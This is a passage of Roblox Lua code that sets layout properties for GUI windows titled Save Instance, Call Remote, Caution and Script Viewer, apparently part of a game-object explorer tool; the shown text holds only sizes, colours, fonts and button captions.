NewGuiPart29.Size = UDim2.new(1, 0, 0, 17) NewGuiPart30.Parent = NewGuiPart29 NewGuiPart30.BackgroundTransparency = 1 NewGuiPart30.Position = UDim2.new(0, 4, 0, 0) NewGuiPart30.Size = UDim2.new(1, -4, 1, 0) NewGuiPart30.Font = Enum.Font.SourceSans NewGuiPart30.FontSize = Enum.FontSize.Size14 NewGuiPart30.Text = "Settings" NewGuiPart30.TextColor3 = Color3.new(0, 0, 0) NewGuiPart30.TextXAlignment = Enum.TextXAlignment.Left NewGuiPart31.Name = "SettingTemplate" NewGuiPart31.Parent = NewGuiPart28 NewGuiPart31.BackgroundColor3 = Color3.new(1, 1, 1) NewGuiPart31.BackgroundTransparency = 1 NewGuiPart31.Position = UDim2.new(0, 0, 0, 18) NewGuiPart31.Size = UDim2.new(1, 0, 0, 60) NewGuiPart31.Visible = false NewGuiPart32.Name = "SName" NewGuiPart32.Parent = NewGuiPart31 NewGuiPart32.BackgroundColor3 = Color3.new(1, 1, 1) NewGuiPart32.BackgroundTransparency = 1 NewGuiPart32.Position = UDim2.new(0, 10, 0, 0) NewGuiPart32.Size = UDim2.new(1, -20, 0, 30) NewGuiPart32.Font = Enum.Font.SourceSans NewGuiPart32.FontSize = Enum.FontSize.Size18 NewGuiPart32.Text = "SettingName" NewGuiPart32.TextXAlignment = Enum.TextXAlignment.Left NewGuiPart33.Name = "Status" NewGuiPart33.Parent = NewGuiPart31 NewGuiPart33.BackgroundColor3 = Color3.new(1, 1, 1) NewGuiPart33.BackgroundTransparency = 1 NewGuiPart33.Position = UDim2.new(0, 60, 0, 30) NewGuiPart33.Size = UDim2.new(0, 50, 0, 15) NewGuiPart33.Font = Enum.Font.SourceSans NewGuiPart33.FontSize = Enum.FontSize.Size18 NewGuiPart33.Text = "Off" NewGuiPart33.TextXAlignment = Enum.TextXAlignment.Left NewGuiPart34.Name = "Change" NewGuiPart34.Parent = NewGuiPart31 NewGuiPart34.BackgroundColor3 = Color3.new(0.862745, 0.862745, 0.862745) NewGuiPart34.BorderSizePixel = 0 NewGuiPart34.Position = UDim2.new(0, 10, 0, 30) NewGuiPart34.Size = UDim2.new(0, 40, 0, 15) NewGuiPart34.Font = Enum.Font.SourceSans NewGuiPart34.FontSize = Enum.FontSize.Size14 NewGuiPart34.Text = "" NewGuiPart35.Name = "OnBar" NewGuiPart35.Parent = NewGuiPart34 NewGuiPart35.BackgroundColor3 = Color3.new(0, 0.576471, 0.862745) NewGuiPart35.BorderSizePixel = 0 NewGuiPart35.Size = UDim2.new(0, 0, 0, 15) NewGuiPart35.Font = Enum.Font.SourceSans NewGuiPart35.FontSize = Enum.FontSize.Size14 NewGuiPart35.Text = "" NewGuiPart36.Name = "Bar" NewGuiPart36.Parent = NewGuiPart34 NewGuiPart36.BackgroundColor3 = Color3.new(0, 0, 0) NewGuiPart36.BorderSizePixel = 0 NewGuiPart36.ClipsDescendants = true NewGuiPart36.Position = UDim2.new(0, -2, 0, -2) NewGuiPart36.Size = UDim2.new(0, 10, 0, 19) NewGuiPart36.Font = Enum.Font.SourceSans NewGuiPart36.FontSize = Enum.FontSize.Size14 NewGuiPart36.Text = "" NewGuiPart37.Name = "SettingList" NewGuiPart37.Parent = NewGuiPart28 NewGuiPart37.BackgroundColor3 = Color3.new(1, 1, 1) NewGuiPart37.BackgroundTransparency = 1 NewGuiPart37.Position = UDim2.new(0, 0, 0, 17) NewGuiPart37.Size = UDim2.new(1, 0, 1, -17) NewGuiPart38.Name = "SaveInstance" NewGuiPart38.Parent = NewGuiPart1 NewGuiPart38.Active = true NewGuiPart38.BackgroundColor3 = Color3.new(0.913726, 0.913726, 0.913726) NewGuiPart38.BorderColor3 = Color3.new(0.584314, 0.584314, 0.584314) NewGuiPart38.Draggable = true NewGuiPart38.Position = UDim2.new(0.300000012, 0, 0.300000012, 0) NewGuiPart38.Size = UDim2.new(0, 350, 0, 20) NewGuiPart38.Visible = false NewGuiPart38.ZIndex = 2 NewGuiPart39.Name = "Title" NewGuiPart39.Parent = NewGuiPart38 NewGuiPart39.BackgroundTransparency = 1 NewGuiPart39.Size = UDim2.new(1, 0, 1, 0) NewGuiPart39.ZIndex = 2 NewGuiPart39.Font = Enum.Font.SourceSans NewGuiPart39.FontSize = Enum.FontSize.Size14 NewGuiPart39.Text = "Save Instance" NewGuiPart39.TextColor3 = Color3.new(0, 0, 0) NewGuiPart39.TextXAlignment = Enum.TextXAlignment.Left NewGuiPart40.Name = "MainWindow" NewGuiPart40.Parent = NewGuiPart38 NewGuiPart40.BackgroundColor3 = Color3.new(1, 1, 1) NewGuiPart40.BackgroundTransparency = 0.10000000149012 NewGuiPart40.BorderColor3 = Color3.new(0.74902, 0.74902, 0.74902) NewGuiPart40.Size = UDim2.new(1, 0, 0, 200) NewGuiPart41.Name = "Save" NewGuiPart41.Parent = NewGuiPart40 NewGuiPart41.BackgroundColor3 = Color3.new(1, 1, 1) NewGuiPart41.BackgroundTransparency = 0.5 NewGuiPart41.BorderColor3 = Color3.new(0, 0, 0) NewGuiPart41.Position = UDim2.new(0.075000003, 0, 1, -40) NewGuiPart41.Size = UDim2.new(0.400000006, 0, 0, 30) NewGuiPart41.Font = Enum.Font.SourceSans NewGuiPart41.FontSize = Enum.FontSize.Size18 NewGuiPart41.Text = "Save" NewGuiPart42.Name = "Desc" NewGuiPart42.Parent = NewGuiPart40 NewGuiPart42.BackgroundColor3 = Color3.new(1, 1, 1) NewGuiPart42.BackgroundTransparency = 1 NewGuiPart42.Position = UDim2.new(0, 0, 0, 20) NewGuiPart42.Size = UDim2.new(1, 0, 0, 40) NewGuiPart42.Font = Enum.Font.SourceSans NewGuiPart42.FontSize = Enum.FontSize.Size14 NewGuiPart42.Text = "This will save an instance to your PC. Type in the name for your instance. (.rbxmx will be added automatically.)" NewGuiPart42.TextWrapped = true NewGuiPart43.Name = "Cancel" NewGuiPart43.Parent = NewGuiPart40 NewGuiPart43.BackgroundColor3 = Color3.new(1, 1, 1) NewGuiPart43.BackgroundTransparency = 0.5 NewGuiPart43.BorderColor3 = Color3.new(0, 0, 0) NewGuiPart43.Position = UDim2.new(0.524999976, 0, 1, -40) NewGuiPart43.Size = UDim2.new(0.400000006, 0, 0, 30) NewGuiPart43.Font = Enum.Font.SourceSans NewGuiPart43.FontSize = Enum.FontSize.Size18 NewGuiPart43.Text = "Cancel" NewGuiPart44.Name = "FileName" NewGuiPart44.Parent = NewGuiPart40 NewGuiPart44.BackgroundColor3 = Color3.new(1, 1, 1) NewGuiPart44.BackgroundTransparency = 0.20000000298023 NewGuiPart44.Position = UDim2.new(0.075000003, 0, 0.400000006, 0) NewGuiPart44.Size = UDim2.new(0.850000024, 0, 0, 30) NewGuiPart44.Font = Enum.Font.SourceSans NewGuiPart44.FontSize = Enum.FontSize.Size18 NewGuiPart44.Text = "" NewGuiPart44.TextXAlignment = Enum.TextXAlignment.Left NewGuiPart45.Name = "SaveObjects" NewGuiPart45.Parent = NewGuiPart40 NewGuiPart45.BackgroundColor3 = Color3.new(1, 1, 1) NewGuiPart45.BackgroundTransparency = 0.60000002384186 NewGuiPart45.Position = UDim2.new(0.075000003, 0, 0.625, 0) NewGuiPart45.Size = UDim2.new(0, 20, 0, 20) NewGuiPart45.ZIndex = 2 NewGuiPart45.Font = Enum.Font.SourceSans NewGuiPart45.FontSize = Enum.FontSize.Size18 NewGuiPart45.Text = "" NewGuiPart45.TextColor3 = Color3.new(1, 1, 1) NewGuiPart46.Name = "enabled" NewGuiPart46.Parent = NewGuiPart45 NewGuiPart46.BackgroundColor3 = Color3.new(0.380392, 0.380392, 0.380392) NewGuiPart46.BackgroundTransparency = 0.40000000596046 NewGuiPart46.BorderSizePixel = 0 NewGuiPart46.Position = UDim2.new(0, 3, 0, 3) NewGuiPart46.Size = UDim2.new(0, 14, 0, 14) NewGuiPart46.Font = Enum.Font.SourceSans NewGuiPart46.FontSize = Enum.FontSize.Size14 NewGuiPart46.Text = "" NewGuiPart47.Name = "Desc2" NewGuiPart47.Parent = NewGuiPart40 NewGuiPart47.BackgroundColor3 = Color3.new(1, 1, 1) NewGuiPart47.BackgroundTransparency = 1 NewGuiPart47.Position = UDim2.new(0.075000003, 30, 0.625, 0) NewGuiPart47.Size = UDim2.new(0.925000012, -30, 0, 20) NewGuiPart47.Font = Enum.Font.SourceSans NewGuiPart47.FontSize = Enum.FontSize.Size14 NewGuiPart47.Text = "Save \"Object\" type values" NewGuiPart47.TextXAlignment = Enum.TextXAlignment.Left NewGuiPart48.Name = "Confirmation" NewGuiPart48.Parent = NewGuiPart1 NewGuiPart48.Active = true NewGuiPart48.BackgroundColor3 = Color3.new(0.913726, 0.913726, 0.913726) NewGuiPart48.BorderColor3 = Color3.new(0.584314, 0.584314, 0.584314) NewGuiPart48.Draggable = true NewGuiPart48.Position = UDim2.new(0.300000012, 0, 0.349999994, 0) NewGuiPart48.Size = UDim2.new(0, 350, 0, 20) NewGuiPart48.Visible = false NewGuiPart48.ZIndex = 3 NewGuiPart49.Name = "Title" NewGuiPart49.Parent = NewGuiPart48 NewGuiPart49.BackgroundTransparency = 1 NewGuiPart49.Size = UDim2.new(1, 0, 1, 0) NewGuiPart49.ZIndex = 3 NewGuiPart49.Font = Enum.Font.SourceSans NewGuiPart49.FontSize = Enum.FontSize.Size14 NewGuiPart49.Text = "Confirm" NewGuiPart49.TextColor3 = Color3.new(0, 0, 0) NewGuiPart49.TextXAlignment = Enum.TextXAlignment.Left NewGuiPart50.Name = "MainWindow" NewGuiPart50.Parent = NewGuiPart48 NewGuiPart50.BackgroundColor3 = Color3.new(1, 1, 1) NewGuiPart50.BackgroundTransparency = 0.10000000149012 NewGuiPart50.BorderColor3 = Color3.new(0.74902, 0.74902, 0.74902) NewGuiPart50.Size = UDim2.new(1, 0, 0, 150) NewGuiPart50.ZIndex = 2 NewGuiPart51.Name = "Yes" NewGuiPart51.Parent = NewGuiPart50 NewGuiPart51.BackgroundColor3 = Color3.new(1, 1, 1) NewGuiPart51.BackgroundTransparency = 0.5 NewGuiPart51.BorderColor3 = Color3.new(0, 0, 0) NewGuiPart51.Position = UDim2.new(0.075000003, 0, 1, -40) NewGuiPart51.Size = UDim2.new(0.400000006, 0, 0, 30) NewGuiPart51.ZIndex = 2 NewGuiPart51.Font = Enum.Font.SourceSans NewGuiPart51.FontSize = Enum.FontSize.Size18 NewGuiPart51.Text = "Yes" NewGuiPart52.Name = "Desc" NewGuiPart52.Parent = NewGuiPart50 NewGuiPart52.BackgroundColor3 = Color3.new(1, 1, 1) NewGuiPart52.BackgroundTransparency = 1 NewGuiPart52.Position = UDim2.new(0, 0, 0, 20) NewGuiPart52.Size = UDim2.new(1, 0, 0, 40) NewGuiPart52.ZIndex = 2 NewGuiPart52.Font = Enum.Font.SourceSans NewGuiPart52.FontSize = Enum.FontSize.Size14 NewGuiPart52.Text = "The file, FILENAME, already exists. Overwrite?" NewGuiPart52.TextWrapped = true NewGuiPart53.Name = "No" NewGuiPart53.Parent = NewGuiPart50 NewGuiPart53.BackgroundColor3 = Color3.new(1, 1, 1) NewGuiPart53.BackgroundTransparency = 0.5 NewGuiPart53.BorderColor3 = Color3.new(0, 0, 0) NewGuiPart53.Position = UDim2.new(0.524999976, 0, 1, -40) NewGuiPart53.Size = UDim2.new(0.400000006, 0, 0, 30) NewGuiPart53.ZIndex = 2 NewGuiPart53.Font = Enum.Font.SourceSans NewGuiPart53.FontSize = Enum.FontSize.Size18 NewGuiPart53.Text = "No" NewGuiPart54.Name = "Caution" NewGuiPart54.Parent = NewGuiPart1 NewGuiPart54.Active = true NewGuiPart54.BackgroundColor3 = Color3.new(0.913726, 0.913726, 0.913726) NewGuiPart54.BorderColor3 = Color3.new(0.584314, 0.584314, 0.584314) NewGuiPart54.Draggable = true NewGuiPart54.Position = UDim2.new(0.300000012, 0, 0.300000012, 0) NewGuiPart54.Size = UDim2.new(0, 350, 0, 20) NewGuiPart54.Visible = false NewGuiPart54.ZIndex = 5 NewGuiPart55.Name = "Title" NewGuiPart55.Parent = NewGuiPart54 NewGuiPart55.BackgroundTransparency = 1 NewGuiPart55.Size = UDim2.new(1, 0, 1, 0) NewGuiPart55.ZIndex = 5 NewGuiPart55.Font = Enum.Font.SourceSans NewGuiPart55.FontSize = Enum.FontSize.Size14 NewGuiPart55.Text = "Caution" NewGuiPart55.TextColor3 = Color3.new(0, 0, 0) NewGuiPart55.TextXAlignment = Enum.TextXAlignment.Left NewGuiPart56.Name = "MainWindow" NewGuiPart56.Parent = NewGuiPart54 NewGuiPart56.BackgroundColor3 = Color3.new(1, 1, 1) NewGuiPart56.BackgroundTransparency = 0.10000000149012 NewGuiPart56.BorderColor3 = Color3.new(0.74902, 0.74902, 0.74902) NewGuiPart56.Size = UDim2.new(1, 0, 0, 150) NewGuiPart56.ZIndex = 4 NewGuiPart57.Name = "Desc" NewGuiPart57.Parent = NewGuiPart56 NewGuiPart57.BackgroundColor3 = Color3.new(1, 1, 1) NewGuiPart57.BackgroundTransparency = 1 NewGuiPart57.Position = UDim2.new(0, 0, 0, 20) NewGuiPart57.Size = UDim2.new(1, 0, 0, 42) NewGuiPart57.ZIndex = 4 NewGuiPart57.Font = Enum.Font.SourceSans NewGuiPart57.FontSize = Enum.FontSize.Size14 NewGuiPart57.Text = "The file, FILENAME, already exists. Overwrite?" NewGuiPart57.TextWrapped = true NewGuiPart58.Name = "Ok" NewGuiPart58.Parent = NewGuiPart56 NewGuiPart58.BackgroundColor3 = Color3.new(1, 1, 1) NewGuiPart58.BackgroundTransparency = 0.5 NewGuiPart58.BorderColor3 = Color3.new(0, 0, 0) NewGuiPart58.Position = UDim2.new(0.300000012, 0, 1, -40) NewGuiPart58.Size = UDim2.new(0.400000006, 0, 0, 30) NewGuiPart58.ZIndex = 4 NewGuiPart58.Font = Enum.Font.SourceSans NewGuiPart58.FontSize = Enum.FontSize.Size18 NewGuiPart58.Text = "Ok" NewGuiPart59.Name = "CallRemote" NewGuiPart59.Parent = NewGuiPart1 NewGuiPart59.Active = true NewGuiPart59.BackgroundColor3 = Color3.new(0.913726, 0.913726, 0.913726) NewGuiPart59.BorderColor3 = Color3.new(0.584314, 0.584314, 0.584314) NewGuiPart59.Draggable = true NewGuiPart59.Position = UDim2.new(0.300000012, 0, 0.300000012, 0) NewGuiPart59.Size = UDim2.new(0, 350, 0, 20) NewGuiPart59.Visible = false NewGuiPart59.ZIndex = 2 NewGuiPart60.Name = "Title" NewGuiPart60.Parent = NewGuiPart59 NewGuiPart60.BackgroundTransparency = 1 NewGuiPart60.Size = UDim2.new(1, 0, 1, 0) NewGuiPart60.ZIndex = 2 NewGuiPart60.Font = Enum.Font.SourceSans NewGuiPart60.FontSize = Enum.FontSize.Size14 NewGuiPart60.Text = "Call Remote" NewGuiPart60.TextColor3 = Color3.new(0, 0, 0) NewGuiPart60.TextXAlignment = Enum.TextXAlignment.Left NewGuiPart61.Name = "MainWindow" NewGuiPart61.Parent = NewGuiPart59 NewGuiPart61.BackgroundColor3 = Color3.new(1, 1, 1) NewGuiPart61.BackgroundTransparency = 0.10000000149012 NewGuiPart61.BorderColor3 = Color3.new(0.74902, 0.74902, 0.74902) NewGuiPart61.Size = UDim2.new(1, 0, 0, 200) NewGuiPart62.Name = "Desc" NewGuiPart62.Parent = NewGuiPart61 NewGuiPart62.BackgroundColor3 = Color3.new(1, 1, 1) NewGuiPart62.BackgroundTransparency = 1 NewGuiPart62.Position = UDim2.new(0, 0, 0, 20) NewGuiPart62.Size = UDim2.new(1, 0, 0, 20) NewGuiPart62.Font = Enum.Font.SourceSans NewGuiPart62.FontSize = Enum.FontSize.Size14 NewGuiPart62.Text = "Arguments" NewGuiPart62.TextWrapped = true NewGuiPart63.Name = "Arguments" NewGuiPart63.Parent = NewGuiPart61 NewGuiPart63.BackgroundColor3 = Color3.new(1, 1, 1) NewGuiPart63.BackgroundTransparency = 1 NewGuiPart63.Position = UDim2.new(0, 0, 0, 40) NewGuiPart63.Size = UDim2.new(1, 0, 0, 80) NewGuiPart63.BottomImage = "rbxasset://textures/blackBkg_square.png" NewGuiPart63.CanvasSize = UDim2.new(0, 0, 0, 0) NewGuiPart63.MidImage = "rbxasset://textures/blackBkg_square.png" NewGuiPart63.TopImage = "rbxasset://textures/blackBkg_square.png" NewGuiPart64.Name = "DisplayReturned" NewGuiPart64.Parent = NewGuiPart61 NewGuiPart64.BackgroundColor3 = Color3.new(1, 1, 1) NewGuiPart64.BackgroundTransparency = 0.60000002384186 NewGuiPart64.Position = UDim2.new(0.075000003, 0, 0.625, 0) NewGuiPart64.Size = UDim2.new(0, 20, 0, 20) NewGuiPart64.ZIndex = 2 NewGuiPart64.Font = Enum.Font.SourceSans NewGuiPart64.FontSize = Enum.FontSize.Size18 NewGuiPart64.Text = "" NewGuiPart64.TextColor3 = Color3.new(1, 1, 1) NewGuiPart65.Name = "enabled" NewGuiPart65.Parent = NewGuiPart64 NewGuiPart65.BackgroundColor3 = Color3.new(0.380392, 0.380392, 0.380392) NewGuiPart65.BackgroundTransparency = 0.40000000596046 NewGuiPart65.BorderSizePixel = 0 NewGuiPart65.Position = UDim2.new(0, 3, 0, 3) NewGuiPart65.Size = UDim2.new(0, 14, 0, 14) NewGuiPart65.Visible = false NewGuiPart65.Font = Enum.Font.SourceSans NewGuiPart65.FontSize = Enum.FontSize.Size14 NewGuiPart65.Text = "" NewGuiPart66.Name = "Desc2" NewGuiPart66.Parent = NewGuiPart61 NewGuiPart66.BackgroundColor3 = Color3.new(1, 1, 1) NewGuiPart66.BackgroundTransparency = 1 NewGuiPart66.Position = UDim2.new(0.075000003, 30, 0.625, 0) NewGuiPart66.Size = UDim2.new(0.925000012, -30, 0, 20) NewGuiPart66.Font = Enum.Font.SourceSans NewGuiPart66.FontSize = Enum.FontSize.Size14 NewGuiPart66.Text = "Display values returned" NewGuiPart66.TextXAlignment = Enum.TextXAlignment.Left NewGuiPart67.Name = "Add" NewGuiPart67.Parent = NewGuiPart61 NewGuiPart67.BackgroundColor3 = Color3.new(1, 1, 1) NewGuiPart67.BackgroundTransparency = 0.5 NewGuiPart67.BorderColor3 = Color3.new(0, 0, 0) NewGuiPart67.Position = UDim2.new(0.800000012, 0, 0.625, 0) NewGuiPart67.Size = UDim2.new(0, 20, 0, 20) NewGuiPart67.Font = Enum.Font.SourceSansBold NewGuiPart67.FontSize = Enum.FontSize.Size24 NewGuiPart67.Text = "+" NewGuiPart68.Name = "Subtract" NewGuiPart68.Parent = NewGuiPart61 NewGuiPart68.BackgroundColor3 = Color3.new(1, 1, 1) NewGuiPart68.BackgroundTransparency = 0.5 NewGuiPart68.BorderColor3 = Color3.new(0, 0, 0) NewGuiPart68.Position = UDim2.new(0.899999976, 0, 0.625, 0) NewGuiPart68.Size = UDim2.new(0, 20, 0, 20) NewGuiPart68.Font = Enum.Font.SourceSansBold NewGuiPart68.FontSize = Enum.FontSize.Size24 NewGuiPart68.Text = "-" NewGuiPart69.Name = "ArgumentTemplate" NewGuiPart69.Parent = NewGuiPart61 NewGuiPart69.BackgroundColor3 = Color3.new(1, 1, 1) NewGuiPart69.BackgroundTransparency = 0.5 NewGuiPart69.BorderColor3 = Color3.new(0.74902, 0.74902, 0.74902) NewGuiPart69.Size = UDim2.new(1, 0, 0, 20) NewGuiPart69.Visible = false NewGuiPart70.Name = "Type" NewGuiPart70.Parent = NewGuiPart69 NewGuiPart70.BackgroundColor3 = Color3.new(1, 1, 1) NewGuiPart70.BackgroundTransparency = 0.89999997615814 NewGuiPart70.BorderColor3 = Color3.new(0, 0, 0) NewGuiPart70.Size = UDim2.new(0.400000006, 0, 0, 20) NewGuiPart70.Font = Enum.Font.SourceSans NewGuiPart70.FontSize = Enum.FontSize.Size18 NewGuiPart70.Text = "Script" NewGuiPart71.Name = "Value" NewGuiPart71.Parent = NewGuiPart69 NewGuiPart71.BackgroundColor3 = Color3.new(1, 1, 1) NewGuiPart71.BackgroundTransparency = 0.89999997615814 NewGuiPart71.Position = UDim2.new(0.400000006, 0, 0, 0) NewGuiPart71.Size = UDim2.new(0.600000024, -12, 0, 20) NewGuiPart71.Font = Enum.Font.SourceSans NewGuiPart71.FontSize = Enum.FontSize.Size14 NewGuiPart71.Text = "" NewGuiPart71.TextXAlignment = Enum.TextXAlignment.Left NewGuiPart72.Name = "Cancel" NewGuiPart72.Parent = NewGuiPart61 NewGuiPart72.BackgroundColor3 = Color3.new(1, 1, 1) NewGuiPart72.BackgroundTransparency = 0.5 NewGuiPart72.BorderColor3 = Color3.new(0, 0, 0) NewGuiPart72.Size = UDim2.new(0.400000006, 0, 0, 30) NewGuiPart72.Font = Enum.Font.SourceSans NewGuiPart72.FontSize = Enum.FontSize.Size18 NewGuiPart72.Text = "Cancel" NewGuiPart73.Name = "Ok" NewGuiPart73.Parent = NewGuiPart61 NewGuiPart73.BackgroundColor3 = Color3.new(1, 1, 1) NewGuiPart73.BackgroundTransparency = 0.5 NewGuiPart73.BorderColor3 = Color3.new(0, 0, 0) NewGuiPart73.Position = UDim2.new(0.075000003, 0, 1, -40) NewGuiPart73.Size = UDim2.new(0.400000006, 0, 0, 30) NewGuiPart73.Font = Enum.Font.SourceSans NewGuiPart73.FontSize = Enum.FontSize.Size18 NewGuiPart73.Text = "Call" NewGuiPart74.Name = "TableCaution" NewGuiPart74.Parent = NewGuiPart1 NewGuiPart74.Active = true NewGuiPart74.BackgroundColor3 = Color3.new(0.913726, 0.913726, 0.913726) NewGuiPart74.BorderColor3 = Color3.new(0.584314, 0.584314, 0.584314) NewGuiPart74.Draggable = true NewGuiPart74.Position = UDim2.new(0.300000012, 0, 0.300000012, 0) NewGuiPart74.Size = UDim2.new(0, 350, 0, 20) NewGuiPart74.Visible = false NewGuiPart74.ZIndex = 2 NewGuiPart75.Name = "MainWindow" NewGuiPart75.Parent = NewGuiPart74 NewGuiPart75.BackgroundColor3 = Color3.new(1, 1, 1) NewGuiPart75.BackgroundTransparency = 0.10000000149012 NewGuiPart75.BorderColor3 = Color3.new(0.74902, 0.74902, 0.74902) NewGuiPart75.Size = UDim2.new(1, 0, 0, 150) NewGuiPart76.Name = "Ok" NewGuiPart76.Parent = NewGuiPart75 NewGuiPart76.BackgroundColor3 = Color3.new(1, 1, 1) NewGuiPart76.BackgroundTransparency = 0.5 NewGuiPart76.BorderColor3 = Color3.new(0, 0, 0) NewGuiPart76.Position = UDim2.new(0.300000012, 0, 1, -40) NewGuiPart76.Size = UDim2.new(0.400000006, 0, 0, 30) NewGuiPart76.Font = Enum.Font.SourceSans NewGuiPart76.FontSize = Enum.FontSize.Size18 NewGuiPart76.Text = "Ok" NewGuiPart77.Name = "TableResults" NewGuiPart77.Parent = NewGuiPart75 NewGuiPart77.BackgroundColor3 = Color3.new(1, 1, 1) NewGuiPart77.BackgroundTransparency = 1 NewGuiPart77.Position = UDim2.new(0, 0, 0, 20) NewGuiPart77.Size = UDim2.new(1, 0, 0, 80) NewGuiPart77.BottomImage = "rbxasset://textures/blackBkg_square.png" NewGuiPart77.CanvasSize = UDim2.new(0, 0, 0, 0) NewGuiPart77.MidImage = "rbxasset://textures/blackBkg_square.png" NewGuiPart77.TopImage = "rbxasset://textures/blackBkg_square.png" NewGuiPart78.Name = "TableTemplate" NewGuiPart78.Parent = NewGuiPart75 NewGuiPart78.BackgroundColor3 = Color3.new(1, 1, 1) NewGuiPart78.BackgroundTransparency = 0.5 NewGuiPart78.BorderColor3 = Color3.new(0.74902, 0.74902, 0.74902) NewGuiPart78.Size = UDim2.new(1, 0, 0, 20) NewGuiPart78.Visible = false NewGuiPart79.Name = "Type" NewGuiPart79.Parent = NewGuiPart78 NewGuiPart79.BackgroundColor3 = Color3.new(1, 1, 1) NewGuiPart79.BackgroundTransparency = 0.89999997615814 NewGuiPart79.Size = UDim2.new(0.400000006, 0, 0, 20) NewGuiPart79.Font = Enum.Font.SourceSans NewGuiPart79.FontSize = Enum.FontSize.Size18 NewGuiPart79.Text = "Script" NewGuiPart80.Name = "Value" NewGuiPart80.Parent = NewGuiPart78 NewGuiPart80.BackgroundColor3 = Color3.new(1, 1, 1) NewGuiPart80.BackgroundTransparency = 0.89999997615814 NewGuiPart80.Position = UDim2.new(0.400000006, 0, 0, 0) NewGuiPart80.Size = UDim2.new(0.600000024, -12, 0, 20) NewGuiPart80.Font = Enum.Font.SourceSans NewGuiPart80.FontSize = Enum.FontSize.Size14 NewGuiPart80.Text = "Script" NewGuiPart81.Name = "Title" NewGuiPart81.Parent = NewGuiPart74 NewGuiPart81.BackgroundTransparency = 1 NewGuiPart81.Size = UDim2.new(1, 0, 1, 0) NewGuiPart81.ZIndex = 2 NewGuiPart81.Font = Enum.Font.SourceSans NewGuiPart81.FontSize = Enum.FontSize.Size14 NewGuiPart81.Text = "Caution" NewGuiPart81.TextColor3 = Color3.new(0, 0, 0) NewGuiPart81.TextXAlignment = Enum.TextXAlignment.Left NewGuiPart82.Name = "ScriptEditor" NewGuiPart82.Parent = NewGuiPart1 NewGuiPart82.Active = true NewGuiPart82.BackgroundColor3 = Color3.new(0.913726, 0.913726, 0.913726) NewGuiPart82.BorderColor3 = Color3.new(0.584314, 0.584314, 0.584314) NewGuiPart82.Draggable = true NewGuiPart82.Position = UDim2.new(0.300000012, 0, 0.300000012, 0) NewGuiPart82.Size = UDim2.new(0, 516, 0, 20) NewGuiPart82.Visible = false NewGuiPart82.ZIndex = 5 NewGuiPart163.Name = "OpenScript" NewGuiPart163.Parent = NewGuiPart82 NewGuiPart163.Archivable = true NewGuiPart83.Name = "Title" NewGuiPart83.Parent = NewGuiPart82 NewGuiPart83.BackgroundTransparency = 1 NewGuiPart83.Size = UDim2.new(1, 0, 1, 0) NewGuiPart83.ZIndex = 5 NewGuiPart83.Font = Enum.Font.SourceSans NewGuiPart83.FontSize = Enum.FontSize.Size14 NewGuiPart83.Text = "Script Viewer" NewGuiPart83.TextColor3 = Color3.new(0, 0, 0) NewGuiPart83.TextXAlignment = Enum.TextXAlignment.Left NewGuiPart84.Name = "Cover" NewGuiPart84.Parent = NewGuiPart82 NewGuiPart84.BackgroundColor3 = Color3.new(1, 1, 1) NewGuiPart84.BorderSizePixel = 0 NewGuiPart84.Position = UDim2.new(0, 0, 3, 0) NewGuiPart84.Size = UDim2.new(0, 516, 0, 416) NewGuiPart85.Name = "EditorGrid" NewGuiPart85.Parent = NewGuiPart82 NewGuiPart85.BackgroundColor3 = Color3.new(1, 1, 1) NewGuiPart85.BorderSizePixel = 0 NewGuiPart85.Position = UDim2.new(0, 0, 3, 0) NewGuiPart85.Size = UDim2.new(0, 500, 0, 400) NewGuiPart86.Name = "TopBar" NewGuiPart86.Parent = NewGuiPart82 NewGuiPart86.BackgroundColor3 = Color3.new(0.941177, 0.941177, 0.941177) NewGuiPart86.BorderColor3 = Color3.new(0.584314, 0.584314, 0.584314) NewGuiPart86.Size = UDim2.new(1, 0, 3, 0) NewGuiPart87.Name = "ScriptBarLeft" NewGuiPart87.Parent = NewGuiPart86 NewGuiPart87.Active = false NewGuiPart87.BackgroundColor3 = Color3.new(0.866667, 0.866667, 0.866667) NewGuiPart87.BorderColor3 = Color3.new(0.584314, 0.584314, 0.584314) NewGuiPart87.Position = UDim2.new(1, -32, 0, 40) NewGuiPart87.Size = UDim2.new(0, 16, 0, 20) NewGuiPart87.AutoButtonColor = false NewGuiPart88.Name = "Arrow Graphic" NewGuiPart88.Parent = NewGuiPart87 NewGuiPart88.BackgroundTransparency = 1 NewGuiPart88.BorderSizePixel = 0 NewGuiPart88.Position = UDim2.new(0.5, -4, 0.5, -4) NewGuiPart88.Size = UDim2.new(0, 8, 0, 8) NewGuiPart89.Name = "Graphic" NewGuiPart89.Parent = NewGuiPart88 NewGuiPart89.BackgroundColor3 = Color3.new(0.584314, 0.584314, 0.584314) NewGuiPart89.BackgroundTransparency = 0.69999998807907 NewGuiPart89.BorderSizePixel = 0 NewGuiPart89.Position = UDim2.new(0.25, 0, 0.375, 0) NewGuiPart89.Size = UDim2.new(0.125, 0, 0.25, 0) NewGuiPart90.Name = "Graphic" NewGuiPart90.Parent = NewGuiPart88 NewGuiPart90.BackgroundColor3 = Color3.new(0.584314, 0.584314, 0.584314) NewGuiPart90.BackgroundTransparency = 0.69999998807907 NewGuiPart90.BorderSizePixel = 0 NewGuiPart90.Position = UDim2.new(0.375, 0, 0.25, 0) NewGuiPart90.Size = UDim2.new(0.125, 0, 0.5, 0) NewGuiPart91.Name = "Graphic" NewGuiPart91.Parent = NewGuiPart88 NewGuiPart91.BackgroundColor3 = Color3.new(0.584314, 0.584314, 0.584314) NewGuiPart91.BackgroundTransparency = 0.69999998807907 NewGuiPart91.BorderSizePixel = 0 NewGuiPart91.Position = UDim2.new(0.5, 0, 0.125, 0) NewGuiPart91.Size = UDim2.new(0.125, 0, 0.75, 0) NewGuiPart92.Name = "Graphic" NewGuiPart92.Parent = NewGuiPart88 NewGuiPart92.BackgroundColor3 = Color3.new(0.584314, 0.584314, 0.584314) NewGuiPart92.BackgroundTransparency = 0.69999998807907 NewGuiPart92.BorderSizePixel = 0 NewGuiPart92.Position = UDim2.new(0.625, 0, 0, 0) NewGuiPart92.Size = UDim2.new(0.125, 0, 1, 0) NewGuiPart93.Name = "ScriptBarRight" NewGuiPart93.Parent = NewGuiPart86 NewGuiPart93.Active = false NewGuiPart93.BackgroundColor3 = Color3.new(0.866667, 0.866667, 0.866667) NewGuiPart93.BorderColor3 = Color3.new(0.584314, 0.584314, 0.584314) NewGuiPart93.Position = UDim2.new(1, -16, 0, 40) NewGuiPart93.Size = UDim2.new(0, 16, 0, 20) NewGuiPart93.AutoButtonColor = false NewGuiPart94.Name = "Arrow Graphic" NewGuiPart94.Parent = 